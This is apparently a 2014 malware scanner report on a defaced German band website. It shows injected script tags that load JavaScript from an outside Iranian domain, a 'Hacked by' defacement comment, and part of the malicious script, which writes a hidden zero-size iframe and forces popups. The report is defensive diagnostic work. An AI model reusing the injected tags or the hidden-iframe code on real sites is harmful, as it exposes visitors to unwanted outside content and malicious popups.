New scan:

Malware Scanner report for highway-65.de

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/1/1
1 suspicious iframe found. See details below
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

!--Hacked by --  (215 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://highway-65.de/
200 OK
Content-Length: 23093
Content-Type: text/html
suspicious
Deface/Content modification. The following signature was found: !--Hacked by --

<script src="http://narc.ir/mtp1376/secapps/a.js"></script><div id="jafar"></div>
<script src="http://narc.ir/mtp1376/secapps/a.js"></script><div id="jafar"></div>
<script src="http://narc.ir/mtp1376/secapps/a.js"></script><div id="jafar"></div>
<!--Hacked by -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-de" lang="de-de" >
<head>
<base href="http://highway-65.de/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta
...[28542 bytes skipped]...


http://narc.ir/mtp1376/secapps/a.js
200 OK
Content-Length: 2120
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe width="0" height="0" src="http://www.secapps.org/"></iframe>');
var needpopupfck = 1;
var vc_cn = "__popUp";
var link = "http://www.secapps.org/";
if (readCookiefck(vc_cn)&&readCookiefck(vc_cn)==2) {
needpopupfck = 0;
}else{
needpopupfck = 1;
}
var Page_Popped_fck = false;
var Page_Loaded_fck = false;
var Page_Enter_fck;
if (needpopupfck == 1) {
InitPopfck();
}
function InitPopf
... 1282 bytes are skipped ...
dpopupfck == 1 ) {
window.open('javascript:void(0)', '_parent','toolbar=1,location=1,directories=1,status=1,menubar=1,scrollbars=1,resizable=1');
window.focus();
if(window.open(link,'_blank','toolbar=1,scrollbars=1,location=1,statusbar=1,menubar=1,resizable=1')){
window.focus();
IncrementCountfck();
} else {
window.focus();
if (Page_Loaded_fck) initAdLayer();
else XBrowserAddHandlerPops(window, "load", "initAdLayer")
}
}
}

Antivirus reports:

TrendMicro-HouseCall
Mal_Hifrm
TrendMicro
Mal_Hifrm

Hidden iFrame found.
size: 0x0     
src: http://www.secapps.org/

<iframe width="0" height="0" src="http://www.secapps.org/">

http://highway-65.de/components/com_jfbconnect/includes/jfbconnect.js
200 OK
Content-Length: 6553
Content-Type: application/javascript
clean
http://highway-65.de/media/system/js/caption.js
200 OK
Content-Length: 1963
Content-Type: application/javascript
clean
http://highway-65.de/modules/mod_superfishmenu/tmpl/js/jquery.js
200 OK
Content-Length: 55805
Content-Type: application/javascript
clean
http://highway-65.de/modules/mod_superfishmenu/tmpl/js/jquery.event.hover.js
200 OK
Content-Length: 3595
Content-Type: application/javascript
clean
http://highway-65.de/modules/mod_superfishmenu/tmpl/js/superfish.js
200 OK
Content-Length: 3959
Content-Type: application/javascript
clean
http://highway-65.de/templates/tbc_fivepoint_unity/sifr.js
200 OK
Content-Length: 10361
Content-Type: application/javascript
clean
http://highway-65.de/modules/mod_analytics/gatr.js
200 OK
Content-Length: 2019
Content-Type: application/javascript
clean
http://highway-65.de/termine
200 OK
Content-Length: 10166
Content-Type: text/html
clean
http://highway-65.de/band
200 OK
Content-Length: 10484
Content-Type: text/html
clean
http://highway-65.de/band/fibi
200 OK
Content-Length: 10107
Content-Type: text/html
clean
http://highway-65.de/band/jey
200 OK
Content-Length: 45366
Content-Type: text/html
clean
http://highway-65.de/band/beiz
200 OK
Content-Length: 66299
Content-Type: text/html
clean
http://highway-65.de/band/bully
200 OK
Content-Length: 10482
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: highway-65.de

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 18 Jun 2014 06:36:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: highway-65.de
Referer: http://www.google.com/search?q=highway-65.de

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=highway-65.de

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://highway-65.de/

Result: highway-65.de is not infected or malware details are not published yet.